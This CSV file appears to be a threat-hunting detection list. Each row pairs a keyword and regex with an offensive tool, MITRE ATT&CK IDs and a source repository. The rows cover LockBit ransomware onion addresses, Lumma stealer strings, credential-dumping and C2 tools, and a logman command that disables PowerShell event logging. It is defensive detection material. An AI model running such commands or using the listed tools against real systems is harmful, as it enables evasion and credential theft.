"*lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly*",".{0,1000}lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51271"
"*lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion*",".{0,1000}lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51272"
"*lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly*",".{0,1000}lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51273"
"*lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion*",".{0,1000}lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51274"
"*lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly*",".{0,1000}lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51275"
"*lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion*",".{0,1000}lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51276"
"*lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly*",".{0,1000}lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51277"
"*lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd.onion*",".{0,1000}lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51278"
"*lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd.onion.ly*",".{0,1000}lockbitapt72iw55njgnqpymggskg5yp75ry7rirtdg4m7i42artsbqd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51279"
"*lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion*",".{0,1000}lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51280"
"*lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid.onion.ly*",".{0,1000}lockbitaptawjl6udhpd323uehekiyatj6ftcxmkwe5sezs4fqgpjpid\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51281"
"*lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion*",".{0,1000}lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51282"
"*lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd.onion.ly*",".{0,1000}lockbitaptbdiajqtplcrigzgdjprwugkkut63nbvy2d5r4w2agyekqd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51283"
"*lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion*",".{0,1000}lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51284"
"*lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly*",".{0,1000}lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd\.onion\.ly.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51285"
"*lockbitb42tkml3ipianjbs6e33vhcshb7oxm2stubfvdzn3y2yqgbad.onion*",".{0,1000}lockbitb42tkml3ipianjbs6e33vhcshb7oxm2stubfvdzn3y2yqgbad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51286"
"*lockbitcuo23q7qrymbk6dsp2sadltspjvjxgcyp4elbnbr6tcnwq7qd.onion*",".{0,1000}lockbitcuo23q7qrymbk6dsp2sadltspjvjxgcyp4elbnbr6tcnwq7qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51287"
"*lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion*",".{0,1000}lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51288"
"*lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion*",".{0,1000}lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51289"
"*lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd.onion*",".{0,1000}lockbitsupa7e3b4pkn4mgkgojrl5iqgx24clbzc4xm7i6jeetsia3qd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51290"
"*lockbitsupdwon76nzykzblcplixwts4n4zoecugz2bxabtapqvmzqqd.onion*",".{0,1000}lockbitsupdwon76nzykzblcplixwts4n4zoecugz2bxabtapqvmzqqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51291"
"*lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion*",".{0,1000}lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51292"
"*lockbitsupo7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7c6xjad.onion*",".{0,1000}lockbitsupo7vv5vcl3jxpsdviopwvasljqcstym6efhh6oze7c6xjad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51293"
"*lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwqd.onion*",".{0,1000}lockbitsupq3g62dni2f36snrdb4n5qzqvovbtkt5xffw3draxk6gwqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51294"
"*lockbitsupqfyacidr6upt6nhhyipujvaablubuevxj6xy3frthvr3yd.onion*",".{0,1000}lockbitsupqfyacidr6upt6nhhyipujvaablubuevxj6xy3frthvr3yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51295"
"*lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion*",".{0,1000}lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51296"
"*lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion*",".{0,1000}lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51297"
"*lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd.onion*",".{0,1000}lockbitsupxcjntihbmat4rrh7ktowips2qzywh6zer5r3xafhviyhqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51298"
"*lockless *.dat*",".{0,1000}lockless\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","51299"
"*LockLess.exe */copy*",".{0,1000}LockLess\.exe\s.{0,1000}\/copy.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","51300"
"*LockLess.exe all*",".{0,1000}LockLess\.exe\sall.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","0","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","51301"
"*LockLess.exe*",".{0,1000}LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","51302"
"*Locksmith-main.zip*",".{0,1000}Locksmith\-main\.zip.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","N/A","8","10","1086","100","2025-04-21T12:43:50Z","2022-04-28T01:37:32Z","51303"
"*Loedx765gin Daedx765ta*",".{0,1000}Loedx765gin\sDaedx765ta.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51314"
"*log4_shell.rb*",".{0,1000}log4_shell\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","51315"
"*log4shell*.nessus.org*",".{0,1000}log4shell.{0,1000}\.nessus\.org.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability Scanner","https://fr.tenable.com/products/nessus","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","51316"
"*log4shell.py*",".{0,1000}log4shell\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","51317"
"*log4shell-scanner.jar*",".{0,1000}log4shell\-scanner\.jar.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","1","N/A","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","51318"
"*logangoins/Cable*",".{0,1000}logangoins\/Cable.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","1","N/A","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","51319"
"*logangoins/Krueger*",".{0,1000}logangoins\/Krueger.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","1","N/A","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","51320"
"*logangoins/Stifle*",".{0,1000}logangoins\/Stifle.{0,1000}","offensive_tool_keyword","Stifle",".NET Post-Exploitation Utility for Abusing Explicit Certificate Mappings in ADCS","T1550.003 - T1552.004 - T1606.002","TA0006 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/logangoins/Stifle","1","1","N/A","N/A","7","2","140","9","2025-02-10T04:58:46Z","2025-02-08T06:13:43Z","51321"
"*Logedx765in Daedx765ta Foedx765r Accedx765ount*",".{0,1000}Logedx765in\sDaedx765ta\sFoedx765r\sAccedx765ount.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51322"
"*Logging key presses... ctrl-c to quit*",".{0,1000}Logging\skey\spresses\.\.\.\sctrl\-c\sto\squit.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","51323"
"*logging.getLogger(""nemesis"")*",".{0,1000}logging\.getLogger\(\""nemesis\""\).{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","51324"
"*LoGiC.NET.exe*",".{0,1000}LoGiC\.NET\.exe.{0,1000}","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","6","513","80","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z","51325"
"*login.php?LOGMEOUTPLZ=true*",".{0,1000}login\.php\?LOGMEOUTPLZ\=true.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","51326"
"*login-securite/conpass*",".{0,1000}login\-securite\/conpass.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","1","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","51330"
"*login-securite/lsassy*",".{0,1000}login\-securite\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51331"
"*login-securite/lsassy*",".{0,1000}login\-securite\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51332"
"*loginsight.thrift*",".{0,1000}loginsight\.thrift.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","Black Basta","Exploitation tool","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","N/A","Added to cover the POC exploitation used in  massive ransomware campagne that exploit public facing Vmware ESXI product ","4","2","149","22","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z","51333"
"*logit(`New subscriber: TOBROWSER__*",".{0,1000}logit\(\`New\ssubscriber\:\sTOBROWSER__.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#content","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","51334"
"*logman update trace EventLog-Application --p Microsoft-Windows-PowerShell -ets*",".{0,1000}logman\supdate\strace\sEventLog\-Application\s\-\-p\sMicrosoft\-Windows\-PowerShell\s\-ets.{0,1000}","offensive_tool_keyword","logman","disables Microsoft-Windows-PowerShell event logging until a reboot occurs or the attacker restores the ETW provider","T1562.004 - T1070.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","51335"
"*LogonPasswords\*-LogonPasswords.txt*",".{0,1000}LogonPasswords\\.{0,1000}\-LogonPasswords\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","51338"
"*LogonPasswords\.AllUniqueNTLM.txt*",".{0,1000}LogonPasswords\\\.AllUniqueNTLM\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","51339"
"*LogonTracer*",".{0,1000}LogonTracer.{0,1000}","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","N/A","6","10","2878","457","2024-06-21T06:06:32Z","2017-11-24T06:07:49Z","51340"
"*logs/maitm.log""*",".{0,1000}logs\/maitm\.log\"".{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","51342"
"*logs/Responder-Session.log*",".{0,1000}logs\/Responder\-Session\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","51343"
"*logs/ridenum.log*",".{0,1000}logs\/ridenum\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","51344"
"*logs/shares-with-SCF.txt*",".{0,1000}logs\/shares\-with\-SCF\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","51345"
